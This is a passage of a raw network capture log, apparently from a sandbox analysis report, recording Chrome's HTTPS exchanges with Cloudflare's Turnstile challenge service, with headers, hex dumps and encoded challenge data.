                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:50:23 UTC379INHTTP/1.1 404 Not Found
                                                                                                Date: Wed, 08 Jan 2025 13:50:23 GMT
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 7
                                                                                                Connection: close
                                                                                                cf-chl-out: x5mid4ZXJIYHCUD0k+UPLuQfynLE6MpvaWg=$fkpCZy8N0W+fOgqO
                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8feca8033aec4276-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2025-01-08 13:50:23 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                Data Ascii: invalid


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                30192.168.2.550035104.18.95.414438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:50:23 UTC811OUTGET /cdn-cgi/challenge-platform/h/g/pat/8feca7eefaf042bb/1736344221782/d00671299b791ce228010dbde9ff40dbe716ec779dfb4c031bfbbfe8e91f0180/YC-1qhwLFuhwYEG HTTP/1.1
                                                                                                Host: challenges.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: max-age=0
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: same-origin
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/uuwta/0x4AAAAAAA4kMM4osA_FHLjs/auto/fbE/normal/auto/
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:50:23 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                Date: Wed, 08 Jan 2025 13:50:23 GMT
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                Content-Length: 1
                                                                                                Connection: close
                                                                                                2025-01-08 13:50:23 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 30 41 5a 78 4b 5a 74 35 48 4f 49 6f 41 51 32 39 36 66 39 41 32 2d 63 57 37 48 65 64 2d 30 77 44 47 5f 75 5f 36 4f 6b 66 41 59 41 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g0AZxKZt5HOIoAQ296f9A2-cW7Hed-0wDG_u_6OkfAYAAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                2025-01-08 13:50:23 UTC1INData Raw: 4a
                                                                                                Data Ascii: J


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                31192.168.2.550034104.18.95.414438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:50:23 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8feca7eefaf042bb/1736344221782/yp26R9IhIYuAHho HTTP/1.1
                                                                                                Host: challenges.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:50:23 UTC200INHTTP/1.1 200 OK
                                                                                                Date: Wed, 08 Jan 2025 13:50:23 GMT
                                                                                                Content-Type: image/png
                                                                                                Content-Length: 61
                                                                                                Connection: close
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8feca8075cf28cb3-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2025-01-08 13:50:23 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1c 00 00 00 47 08 02 00 00 00 9b 26 b0 f7 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                Data Ascii: PNGIHDRG&IDAT$IENDB`


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                32192.168.2.550036104.18.95.414438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:50:25 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1616110350:1736343072:QTukKO-3rnkh5oSMj4bmwfvqfLwGTNfL7xuiRGubg6s/8feca7eefaf042bb/ghySCgmgzWFOmDPDrS26.j0yKRYwxDxH8pEt0ykykzM-1736344220-1.1.1.1-2XIMhubvoLlhHuebeEIOvK9GTQZzT7N5Q9E3GGq2qaz955cD2DXnSYumL7LUYM33 HTTP/1.1
                                                                                                Host: challenges.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                Content-Length: 32464
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                CF-Chl-RetryAttempt: 0
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                CF-Challenge: ghySCgmgzWFOmDPDrS26.j0yKRYwxDxH8pEt0ykykzM-1736344220-1.1.1.1-2XIMhubvoLlhHuebeEIOvK9GTQZzT7N5Q9E3GGq2qaz955cD2DXnSYumL7LUYM33
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: */*
                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                Sec-Fetch-Site: same-origin
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/uuwta/0x4AAAAAAA4kMM4osA_FHLjs/auto/fbE/normal/auto/
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:50:25 UTC16384OUTData Raw: 76 5f 38 66 65 63 61 37 65 65 66 61 66 30 34 32 62 62 3d 39 4a 24 72 4e 79 70 63 69 79 69 37 24 37 62 70 36 35 24 72 49 24 7a 62 79 6e 70 77 5a 47 72 67 69 5a 48 5a 35 72 67 4a 5a 67 5a 68 72 66 68 72 5a 33 24 53 5a 41 69 56 24 4a 5a 74 36 24 5a 58 72 50 68 70 58 46 6a 79 56 5a 54 5a 62 69 70 70 5a 5a 6c 56 56 24 72 39 24 70 35 46 34 72 37 48 5a 39 6a 72 5a 74 4d 56 4d 68 74 77 5a 24 68 5a 53 67 4d 77 74 46 37 4d 6e 52 4b 62 5a 67 50 50 79 2d 70 54 66 62 42 4a 5a 6d 32 5a 70 31 47 24 51 30 34 42 43 41 5a 32 69 47 4a 58 49 75 70 41 64 66 5a 66 43 57 4a 74 50 47 38 24 69 24 5a 6c 36 7a 36 6c 62 56 5a 4d 6a 50 73 6c 71 4e 61 52 34 72 24 79 24 77 61 36 73 41 45 64 32 58 68 70 73 42 61 48 4d 73 4b 4b 64 74 45 76 39 6d 53 39 45 6f 34 37 25 32 62 48 30 42 4b 53
                                                                                                Data Ascii: v_8feca7eefaf042bb=9J$rNypciyi7$7bp65$rI$zbynpwZGrgiZHZ5rgJZgZhrfhrZ3$SZAiV$JZt6$ZXrPhpXFjyVZTZbippZZlVV$r9$p5F4r7HZ9jrZtMVMhtwZ$hZSgMwtF7MnRKbZgPPy-pTfbBJZm2Zp1G$Q04BCAZ2iGJXIupAdfZfCWJtPG8$i$Zl6z6lbVZMjPslqNaR4r$y$wa6sAEd2XhpsBaHMsKKdtEv9mS9Eo47%2bH0BKS
                                                                                                2025-01-08 13:50:25 UTC16080OUTData Raw: 59 56 50 41 50 5a 35 4f 72 79 5a 6f 41 54 57 79 46 49 41 7a 43 38 49 38 56 5a 58 66 77 5a 79 24 5a 50 5a 49 24 70 77 5a 57 72 39 72 79 5a 69 62 41 77 41 37 55 5a 57 68 7a 55 79 68 33 2b 5a 35 41 5a 61 5a 5a 72 4d 54 37 6a 5a 33 72 35 68 5a 50 5a 32 5a 79 69 70 36 5a 64 72 35 5a 5a 48 5a 4c 72 67 68 79 64 5a 52 5a 6b 74 4c 48 5a 4e 72 49 24 37 24 70 24 5a 49 76 6d 46 72 56 5a 63 72 5a 61 5a 68 72 50 2b 46 7a 5a 4f 5a 49 2d 79 68 5a 38 64 37 5a 4d 34 41 77 50 36 41 5a 63 5a 6f 5a 49 24 5a 75 5a 56 69 50 63 5a 2d 5a 31 6c 71 56 37 50 5a 54 5a 7a 5a 70 77 5a 4d 47 39 69 5a 4f 4d 55 72 77 24 37 57 5a 47 72 50 69 5a 6e 5a 74 4a 4c 53 5a 57 5a 46 72 4d 68 5a 64 5a 4b 72 37 68 70 55 41 38 41 67 55 70 6a 5a 74 4a 24 34 70 72 5a 39 56 7a 66 70 6a 72 63 56 77 56 70
                                                                                                Data Ascii: YVPAPZ5OryZoATWyFIAzC8I8VZXfwZy$ZPZI$pwZWr9ryZibAwA7UZWhzUyh3+Z5AZaZZrMT7jZ3r5hZPZ2Zyip6Zdr5ZZHZLrghydZRZktLHZNrI$7$p$ZIvmFrVZcrZaZhrP+FzZOZI-yhZ8d7ZM4AwP6AZcZoZI$ZuZViPcZ-Z1lqV7PZTZzZpwZMG9iZOMUrw$7WZGrPiZnZtJLSZWZFrMhZdZKr7hpUA8AgUpjZtJ$4prZ9VzfpjrcVwVp
                                                                                                2025-01-08 13:50:25 UTC318INHTTP/1.1 200 OK
                                                                                                Date: Wed, 08 Jan 2025 13:50:25 GMT
                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                Content-Length: 26268
                                                                                                Connection: close
                                                                                                cf-chl-gen: P5AcE+S2Mfg5VXk7Suy2N50lGmWUP7AmHxPP6eP0qp38cNLiQzboTT+ZwEv40hTIsqI=$4B7tCQITc/tCKfGR
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8feca80ed89f0f88-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2025-01-08 13:50:25 UTC1051INData Raw: 59 47 70 6d 67 6f 4f 42 64 49 64 52 6c 49 71 46 57 34 57 4e 68 33 31 37 66 35 5a 61 6e 6c 36 61 58 71 4f 6d 69 61 4b 6e 6c 6e 6d 73 5a 6d 4f 69 62 71 4b 70 6c 36 4f 48 73 4b 75 61 73 4a 6c 35 73 34 32 7a 66 63 53 45 72 71 44 46 6e 62 71 69 67 37 57 44 68 4d 57 6d 6f 61 57 37 78 34 33 4d 77 64 6e 4a 75 4c 6d 33 73 35 79 58 6f 4e 57 63 30 72 75 58 30 71 4c 57 33 62 6a 54 34 65 53 75 33 71 37 76 72 65 62 42 35 2f 62 78 38 39 4f 79 39 72 6e 78 79 62 57 39 39 76 4b 35 34 2f 6a 37 38 39 6e 34 2b 2b 72 46 2b 50 6e 36 79 67 44 4e 42 76 45 49 47 42 62 58 38 50 49 52 2f 50 4c 78 43 65 7a 70 32 50 33 31 45 64 77 66 35 77 50 39 41 75 49 5a 2f 69 33 6d 2b 77 6b 53 45 42 38 4e 37 2f 67 6a 46 50 4d 53 4b 69 7a 34 41 55 4d 4e 2b 51 49 7a 45 79 4d 55 52 77 55 6d 49 55 41
                                                                                                Data Ascii: YGpmgoOBdIdRlIqFW4WNh317f5Zanl6aXqOmiaKnlnmsZmOibqKpl6OHsKuasJl5s42zfcSErqDFnbqig7WDhMWmoaW7x43MwdnJuLm3s5yXoNWc0ruX0qLW3bjT4eSu3q7vrebB5/bx89Oy9rnxybW99vK54/j789n4++rF+Pn6ygDNBvEIGBbX8PIR/PLxCezp2P31Edwf5wP9AuIZ/i3m+wkSEB8N7/gjFPMSKiz4AUMN+QIzEyMURwUmIUA
                                                                                                2025-01-08 13:50:25 UTC1369INData Raw: 65 5a 33 4e 79 68 61 4a 31 70 61 4b 4f 62 61 6d 71 6d 37 57 49 6c 62 65 51 6d 61 69 6d 74 62 4b 75 75 58 61 76 73 4b 36 74 75 72 62 42 79 62 65 34 74 5a 32 61 68 4d 4b 6e 6a 4d 43 39 6f 61 43 70 71 38 61 69 74 35 71 6c 6d 72 53 70 32 37 4c 53 74 4f 57 33 72 39 32 68 31 74 4f 6a 74 72 57 35 72 2b 54 79 78 4d 2b 73 7a 63 58 31 77 38 2f 70 32 62 53 7a 36 37 37 37 37 74 50 4d 39 4d 34 46 75 66 54 62 43 2b 62 49 37 74 6a 5a 35 4e 76 71 44 75 33 54 34 78 67 53 47 41 38 53 32 50 6e 31 48 2b 2f 35 49 76 4d 63 38 77 55 6f 48 4f 41 65 47 79 7a 36 2f 54 45 4c 45 69 63 6f 44 79 67 50 49 68 58 33 4c 41 59 46 4d 78 34 51 4e 76 63 79 4a 50 30 78 4a 54 73 56 4e 68 30 4c 42 79 4d 6d 55 55 34 70 4c 6a 41 39 4b 42 45 76 56 43 74 58 56 30 6f 2b 47 68 67 61 54 6d 41 30 55 6a
                                                                                                Data Ascii: eZ3NyhaJ1paKObamqm7WIlbeQmaimtbKuuXavsK6turbBybe4tZ2ahMKnjMC9oaCpq8ait5qlmrSp27LStOW3r92h1tOjtrW5r+TyxM+szcX1w8/p2bSz67777tPM9M4FufTbC+bI7tjZ5NvqDu3T4xgSGA8S2Pn1H+/5IvMc8wUoHOAeGyz6/TELEicoDygPIhX3LAYFMx4QNvcyJP0xJTsVNh0LByMmUU4pLjA9KBEvVCtXV0o+GhgaTmA0Uj
                                                                                                2025-01-08 13:50:25 UTC1369INData Raw: 66 34 61 44 6d 59 65 64 73 57 75 54 63 34 2b 6e 75 5a 6c 74 6c 71 2b 59 75 61 6d 2b 6d 33 36 56 76 59 35 39 67 35 6d 54 79 71 65 34 6c 38 57 74 70 4b 48 46 71 61 43 56 6e 38 61 78 6a 4a 57 78 32 37 2b 39 73 70 69 78 34 39 43 74 34 37 6d 6a 73 62 4c 63 74 2b 58 57 34 63 33 71 77 61 7a 72 70 37 4b 74 78 2b 54 30 75 75 65 34 73 4f 6e 49 32 62 76 72 76 4d 33 65 35 50 54 56 76 4e 66 35 35 38 7a 47 2f 4e 76 36 36 39 7a 67 7a 41 59 47 42 74 41 48 46 39 66 6f 38 50 67 67 46 66 41 58 34 4e 30 6a 45 67 6b 70 41 52 34 4c 4b 68 73 52 2f 65 51 41 49 67 76 30 37 69 55 45 4a 41 51 6e 4a 67 30 39 39 79 72 37 52 53 38 57 4f 52 38 78 4e 45 49 49 41 77 78 42 50 67 77 67 52 42 52 57 46 44 46 42 55 6a 6b 54 54 79 6f 37 56 46 6c 68 4d 57 4d 64 4c 7a 6f 78 51 53 46 56 58 6b 6f
                                                                                                Data Ascii: f4aDmYedsWuTc4+nuZltlq+Yuam+m36VvY59g5mTyqe4l8WtpKHFqaCVn8axjJWx27+9spix49Ct47mjsbLct+XW4c3qwazrp7Ktx+T0uue4sOnI2bvrvM3e5PTVvNf558zG/Nv669zgzAYGBtAHF9fo8PggFfAX4N0jEgkpAR4LKhsR/eQAIgv07iUEJAQnJg099yr7RS8WOR8xNEIIAwxBPgwgRBRWFDFBUjkTTyo7VFlhMWMdLzoxQSFVXko
                                                                                                2025-01-08 13:50:25 UTC1369INData Raw: 36 53 66 74 71 57 59 6f 72 4b 6f 6c 33 79 2b 72 6f 79 71 75 72 43 50 68 4d 61 31 68 6f 47 2f 6f 4a 33 4c 76 71 37 4e 69 49 69 51 6a 71 47 78 6f 73 69 6f 75 4c 61 76 76 4a 57 30 76 37 66 66 6f 2b 47 62 33 72 32 34 73 64 61 35 31 36 72 4e 71 4d 58 64 32 71 33 6a 36 72 47 70 72 72 50 61 7a 4f 37 4c 75 4d 37 4f 38 76 76 72 77 51 48 37 39 77 72 62 43 39 73 4b 35 67 4c 77 41 66 6e 4b 79 77 2f 56 42 51 62 69 31 77 54 32 33 4f 77 59 45 42 72 33 44 4f 73 62 39 78 73 6b 42 66 37 6b 36 2b 49 73 4b 51 4d 66 36 67 45 70 35 69 76 30 42 51 45 44 47 66 51 70 45 50 55 73 43 77 76 37 47 6a 45 59 53 44 51 54 45 30 6e 39 4f 53 42 50 4b 77 30 7a 48 52 34 70 49 43 39 53 4d 68 67 6f 58 46 5a 63 56 52 5a 56 48 46 77 34 57 7a 55 31 4a 56 35 64 49 55 42 6a 52 43 46 77 61 58 4e 45
                                                                                                Data Ascii: 6SftqWYorKol3y+royqurCPhMa1hoG/oJ3Lvq7NiIiQjqGxosiouLavvJW0v7ffo+Gb3r24sda516rNqMXd2q3j6rGprrPazO7LuM7O8vvrwQH79wrbC9sK5gLwAfnKyw/VBQbi1wT23OwYEBr3DOsb9xskBf7k6+IsKQMf6gEp5iv0BQEDGfQpEPUsCwv7GjEYSDQTE0n9OSBPKw0zHR4pIC9SMhgoXFZcVRZVHFw4WzU1JV5dIUBjRCFwaXNE
                                                                                                2025-01-08 13:50:25 UTC1369INData Raw: 4a 37 73 4c 71 58 65 71 74 2b 6f 6e 32 64 6c 59 36 48 76 49 47 69 67 35 57 57 71 61 79 78 6d 72 43 67 72 62 4b 79 79 71 44 45 6b 4a 4b 63 30 71 36 6e 72 38 4c 62 77 4d 48 44 76 65 47 6c 30 39 50 4d 75 61 50 73 6f 66 48 77 71 4d 65 38 77 4b 2f 66 75 4d 6a 70 74 66 50 75 36 63 76 4b 2b 76 7a 37 75 72 73 41 38 39 6a 5a 39 4e 62 55 43 75 48 5a 7a 4d 63 4f 36 65 62 6b 34 4f 59 51 44 41 55 53 47 66 33 39 46 76 6e 59 41 78 6a 75 44 68 48 6a 2b 67 73 4d 34 2b 67 6b 48 69 63 70 47 69 59 72 4d 50 55 59 43 43 77 6e 4a 67 6e 31 43 68 37 35 2b 45 4d 32 46 43 4d 57 4f 69 59 53 50 69 78 43 46 79 38 39 48 6b 55 62 51 51 30 6d 45 45 64 50 4d 7a 74 48 46 6b 67 51 54 69 38 2b 56 56 41 65 4e 7a 68 61 52 32 51 6d 54 43 68 5a 56 6d 4e 41 54 31 4a 69 56 46 49 73 61 54 4a 30 4c
                                                                                                Data Ascii: J7sLqXeqt+on2dlY6HvIGig5WWqayxmrCgrbKyyqDEkJKc0q6nr8LbwMHDveGl09PMuaPsofHwqMe8wK/fuMjptfPu6cvK+vz7ursA89jZ9NbUCuHZzMcO6ebk4OYQDAUSGf39FvnYAxjuDhHj+gsM4+gkHicpGiYrMPUYCCwnJgn1Ch75+EM2FCMWOiYSPixCFy89HkUbQQ0mEEdPMztHFkgQTi8+VVAeNzhaR2QmTChZVmNAT1JiVFIsaTJ0L
                                                                                                2025-01-08 13:50:25 UTC1369INData Raw: 33 6d 71 44 44 6f 71 47 32 70 5a 36 69 71 4b 32 74 6f 73 4c 4c 72 61 71 75 70 62 4f 78 6a 36 44 43 74 4e 72 61 72 71 7a 64 75 4b 71 59 30 63 2b 34 73 62 2b 66 73 72 4b 68 71 38 43 33 79 2b 71 2f 79 63 7a 71 78 63 62 6f 75 4d 4c 5a 79 4e 6e 54 79 39 75 34 79 74 2f 32 38 67 62 6b 76 2b 48 53 33 76 37 74 35 4f 72 59 43 39 33 64 32 2b 44 79 33 75 2f 6c 36 50 51 61 2b 4f 72 55 2b 41 44 58 32 50 77 6a 39 76 51 70 33 78 4c 30 39 66 7a 6a 42 77 30 77 44 77 34 6a 45 67 73 50 46 52 6f 61 44 79 38 34 47 68 63 62 45 69 41 65 2b 77 30 76 44 79 41 59 41 43 51 44 52 78 73 59 4b 43 6b 62 49 68 30 2f 46 69 56 47 52 30 6f 79 45 79 70 49 50 44 77 63 50 7a 35 41 4d 6b 52 46 4d 7a 70 54 53 44 67 35 62 6b 78 69 4d 55 70 42 63 6b 30 2f 51 58 64 56 51 6b 5a 49 61 46 46 49 57 47
                                                                                                Data Ascii: 3mqDDoqG2pZ6iqK2tosLLraqupbOxj6DCtNrarqzduKqY0c+4sb+fsrKhq8C3y+q/yczqxcbouMLZyNnTy9u4yt/28gbkv+HS3v7t5OrYC93d2+Dy3u/l6PQa+OrU+ADX2Pwj9vQp3xL09fzjBw0wDw4jEgsPFRoaDy84GhcbEiAe+w0vDyAYACQDRxsYKCkbIh0/FiVGR0oyEypIPDwcPz5AMkRFMzpTSDg5bkxiMUpBck0/QXdVQkZIaFFIWG
                                                                                                2025-01-08 13:50:25 UTC1369INData Raw: 78 70 57 58 79 61 65 4e 6d 5a 65 59 6e 5a 7a 52 70 34 65 65 31 61 79 34 6f 36 50 61 73 4a 54 4d 6d 71 47 72 71 37 69 74 72 37 44 53 73 72 50 43 71 70 2b 32 37 62 2b 78 75 75 47 38 77 4d 50 31 78 36 2f 43 30 72 50 52 78 74 61 33 7a 4d 6f 42 76 2b 54 4f 39 4d 50 54 30 73 48 4c 34 4e 62 58 44 39 72 62 33 50 37 65 34 42 62 6b 35 4f 49 4b 38 4f 62 55 48 76 6a 74 37 79 4c 30 37 75 37 76 4b 74 76 79 47 67 45 42 39 69 34 46 45 66 6f 69 43 4f 76 2b 44 2f 62 35 38 50 48 36 37 77 67 4a 4b 77 77 4c 44 43 41 47 44 2f 30 41 45 68 56 4b 4b 41 41 63 54 69 51 53 47 31 49 70 49 42 38 67 4a 53 30 6a 45 68 77 39 46 56 34 31 4e 68 6c 69 4d 42 67 77 4d 47 63 31 4e 6a 56 58 4e 79 56 65 50 43 67 37 54 45 56 41 4c 53 34 34 57 54 46 36 54 55 6c 48 57 46 41 30 4f 58 4a 59 50 46 53
                                                                                                Data Ascii: xpWXyaeNmZeYnZzRp4ee1ay4o6PasJTMmqGrq7itr7DSsrPCqp+27b+xuuG8wMP1x6/C0rPRxta3zMoBv+TO9MPT0sHL4NbXD9rb3P7e4Bbk5OIK8ObUHvjt7yL07u7vKtvyGgEB9i4FEfoiCOv+D/b58PH67wgJKwwLDCAGD/0AEhVKKAAcTiQSG1IpIB8gJS0jEhw9FV41NhliMBgwMGc1NjVXNyVePCg7TEVALS44WTF6TUlHWFA0OXJYPFS
                                                                                                2025-01-08 13:50:25 UTC1369INData Raw: 61 6d 2b 75 35 2f 54 6b 38 32 70 73 63 62 44 70 39 79 34 72 62 48 4f 79 70 6d 73 72 37 54 4f 75 38 44 53 73 72 6d 31 79 62 65 38 38 4d 7a 51 75 37 76 45 33 38 66 54 79 4f 4c 50 31 4f 62 47 78 74 6a 2b 34 4e 49 43 38 38 37 55 43 65 54 6f 34 64 50 44 43 74 2f 71 43 2b 62 6c 42 50 44 54 34 66 49 58 42 4f 63 64 2b 4f 33 30 36 41 76 63 37 4f 34 50 42 66 73 6d 46 2b 62 33 4c 53 50 39 42 77 6b 72 37 51 41 31 46 53 41 45 4f 53 73 4b 45 67 55 6e 2f 41 6b 4c 4f 79 45 5a 51 6a 4e 43 46 45 67 45 47 69 4d 6c 52 77 63 63 55 43 55 38 4c 52 38 6c 54 68 39 59 52 79 6f 7a 4e 56 64 61 4c 47 45 78 57 69 74 6b 55 31 41 30 61 54 6c 69 4e 44 5a 62 50 6b 64 4a 61 7a 42 41 64 55 56 75 51 45 4a 6e 5a 45 68 39 54 58 5a 48 57 6d 39 53 57 31 31 2f 52 56 53 4a 57 59 4a 54 5a 6e 74 34
                                                                                                Data Ascii: am+u5/Tk82pscbDp9y4rbHOypmsr7TOu8DSsrm1ybe88MzQu7vE38fTyOLP1ObGxtj+4NIC887UCeTo4dPDCt/qC+blBPDT4fIXBOcd+O306Avc7O4PBfsmF+b3LSP9Bwkr7QA1FSAEOSsKEgUn/AkLOyEZQjNCFEgEGiMlRwccUCU8LR8lTh9YRyozNVdaLGExWitkU1A0aTliNDZbPkdJazBAdUVuQEJnZEh9TXZHWm9SW11/RVSJWYJTZnt4


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                33192.168.2.550037104.18.95.414438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:50:25 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1616110350:1736343072:QTukKO-3rnkh5oSMj4bmwfvqfLwGTNfL7xuiRGubg6s/8feca7eefaf042bb/ghySCgmgzWFOmDPDrS26.j0yKRYwxDxH8pEt0ykykzM-1736344220-1.1.1.1-2XIMhubvoLlhHuebeEIOvK9GTQZzT7N5Q9E3GGq2qaz955cD2DXnSYumL7LUYM33 HTTP/1.1
                                                                                                Host: challenges.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:50:26 UTC379INHTTP/1.1 404 Not Found
                                                                                                Date: Wed, 08 Jan 2025 13:50:25 GMT
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 7
                                                                                                Connection: close
                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                cf-chl-out: eOZbP+Fsy26Pv/erQm3ABPKgXGAgghQzzWo=$4UxTLkLlzN4vlKJj
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8feca8144ecede9b-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2025-01-08 13:50:26 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                Data Ascii: invalid


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                34192.168.2.550038104.18.95.414438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:50:38 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1616110350:1736343072:QTukKO-3rnkh5oSMj4bmwfvqfLwGTNfL7xuiRGubg6s/8feca7eefaf042bb/ghySCgmgzWFOmDPDrS26.j0yKRYwxDxH8pEt0ykykzM-1736344220-1.1.1.1-2XIMhubvoLlhHuebeEIOvK9GTQZzT7N5Q9E3GGq2qaz955cD2DXnSYumL7LUYM33 HTTP/1.1
                                                                                                Host: challenges.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                Content-Length: 34850
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                CF-Chl-RetryAttempt: 0
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                CF-Challenge: ghySCgmgzWFOmDPDrS26.j0yKRYwxDxH8pEt0ykykzM-1736344220-1.1.1.1-2XIMhubvoLlhHuebeEIOvK9GTQZzT7N5Q9E3GGq2qaz955cD2DXnSYumL7LUYM33
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: */*
                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                Sec-Fetch-Site: same-origin
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
